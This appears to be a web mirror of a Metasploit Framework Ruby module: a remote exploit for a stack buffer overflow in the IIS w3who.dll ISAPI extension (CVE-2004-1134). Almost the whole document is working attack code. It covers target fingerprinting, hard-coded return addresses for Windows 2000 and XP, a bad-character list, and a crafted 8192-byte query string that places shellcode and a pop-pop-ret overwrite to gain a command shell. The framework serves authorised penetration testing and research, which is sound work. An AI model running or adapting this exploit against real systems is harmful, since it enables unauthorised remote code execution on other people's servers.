Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/isapi/w3who_query.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
# XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
10
include Msf::Exploit::Remote::HttpClient
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in the w3who.dll ISAPI
19
application. This vulnerability was discovered Nicolas
20
Gregoire and this code has been successfully tested against
21
Windows 2000 and Windows XP (SP2). When exploiting Windows
22
XP, the payload must call RevertToSelf before it will be
23
able to spawn a command shell.
24
},
25
'Author' => [ 'hdm' ],
26
'License' => MSF_LICENSE,
27
'References' => [
28
[ 'CVE', '2004-1134' ],
29
[ 'OSVDB', '12258' ],
30
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
31
[ 'BID', '11820' ]
32
],
33
'Privileged' => false,
34
'DefaultOptions' => {
35
'EXITFUNC' => 'process',
36
},
37
'Payload' => {
38
'Space' => 632,
39
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
40
'MinNops' => 128,
41
'StackAdjustment' => -3500,
42
43
},
44
'Platform' => 'win',
45
'Targets' => [
46
['Automatic Detection', {}],
47
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
48
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
49
],
50
'DefaultTarget' => 0,
51
'DisclosureDate' => '2004-12-06',
52
'Notes' => {
53
'Reliability' => UNKNOWN_RELIABILITY,
54
'Stability' => UNKNOWN_STABILITY,
55
'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
}
57
)
58
)
59
60
register_options(
61
[
62
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
63
]
64
)
65
end
66
67
def auto_target
68
res = send_request_raw(
69
{
70
'uri' => normalize_uri(datastore['URL'])
71
}, -1
72
)
73
http_fingerprint({ :response => res }) # XXX: Needs custom body match
74
75
# Was a vulnerable system detected?
76
t = nil
77
if (res and res.body =~ /Access Token/)
78
case res.headers['Server']
79
when /5\.1/
80
t = targets[2]
81
else
82
t = targets[1]
83
end
84
end
85
t
86
end
87
88
def check
89
if auto_target
90
return Exploit::CheckCode::Appears
91
end
92
93
Exploit::CheckCode::Safe
94
end
95
96
def exploit
97
if (target.name =~ /Automatic/)
98
mytarget = auto_target
99
else
100
mytarget = target
101
end
102
103
if not mytarget
104
fail_with(Failure::NoTarget, "No valid target found")
105
end
106
107
buf = rand_text_english(8192, payload_badchars)
108
buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
109
buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
110
buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
111
buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
112
113
print_status("Sending request...")
114
r = send_request_raw({
115
'uri' => normalize_uri(datastore['URL']),
116
'query' => buf
117
}, 5)
118
119
handler
120
end
121
end
122
123